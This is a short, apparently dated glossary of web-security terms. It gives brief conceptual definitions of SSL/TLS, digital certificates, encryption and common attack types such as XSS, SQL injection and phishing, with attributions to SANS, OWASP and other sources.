|
GLOSSARY OF WEB SECURITY TERMS |
|
Secure Sockets Layer (SSL) |
A form of transaction that protects information being transmitted over the Internet to prevent tampering while it's in transit (from Bank One website). Used by basically every e-commerce web site to protect their transactions. |
| Secure Server | More than just referring to web server which uses SSL protocol; also means reliable, backed up, expandable, resistant to attack. (O'Reilly) |
| Certificate Authority | Authority trusted by one or more users to create and assign certificates. (from Wilde's WWW Online Glossary) |
| Digital Certificate | A digital certificate is an electronic "credit card" that establishes your credentials when doing business or other transactions on the Web. It is issued by a certification authority. It contains your name, a serial number, expiration dates, a copy of the certificate holder's public key (used for encrypting messages and digital signatures), and the digital signature of the certificate-issuing authority so that a recipient can verify that the certificate is real. (Sans) |
| Certificate-Based Authentication | Certificate-Based Authentication is the use of SSL and certificates to authenticate and encrypt HTTP traffic. (Sans) |
| Encryption | Encoding data into a form that conceals the data's original meaning to prevent it from being known or used. |
| PCT (Private Communication Technology) | Microsoft designed PCT to try to improve on Netcape's SSL, but was stopped when SSL was generalized as IETF's TLS protocol. You still might see a few sites such as Expedia say they use it. |
| TLS(Transport Layer Security) | Developed as successor to SSL, main difference that TLS implements open and standards-based solution. |
| Cross-Site Scripting | Cross Site scripting (XSS) is a type of attack that can be carried out to steal sensitive information belonging to the users of a web site. This relies on the server reflecting back user input without checking for embedded javascript. (Owasp) |
| SQL Injection | Technique by which attackers can execute SQL statements of their choice on the backend database by manipulating the input to the application.(Owasp) |
| Buffer Overflow | A buffer overflow occurs when a program or process tries to store more data in a buffer (temporary data storage area) than it was intended to hold. Since buffers are created to contain a finite amount of data, the extra information - which has to go somewhere - can overflow into adjacent buffers, corrupting or overwriting the valid data held in them. (Sans) |
| Denial of Service | The prevention of authorized access to a system resource or the delaying of system operations and functions (Sans) |
| Trojan Horse | A computer program that appears to have a useful function, but also has a hidden and potentially malicious function that evades security mechanisms, sometimes by exploiting legitimate authorizations of a system entity that invokes the program. (Sans) |
| Phishing | When you receive an official looking yet fake email directing you to what looks like a company web site in order to collect financial or password information |
| Zero-Day | New, unknown vulnerability which is difficult to guard against |
| Mobile Code | Programs that augments functionality of browsers by asking users to download and run additional programs (Ex. Plug-Ins, ActiveX,Java, Flash) |
| SET (Secure Electronic Transaction) | Secure Electronic Transactions is a protocol developed for credit card transactions in which all parties (customers, merchant, and bank) are authenticated using digital signatures, encryption protects the message and provides integrity, and provides end-to-end security for credit card transactions online. (Sans)Fallen out of favor, but could still return |
Extremely comprehensive glossary can be found on Sans Institute's Glossary as well as Wilde's WWW Online Glossary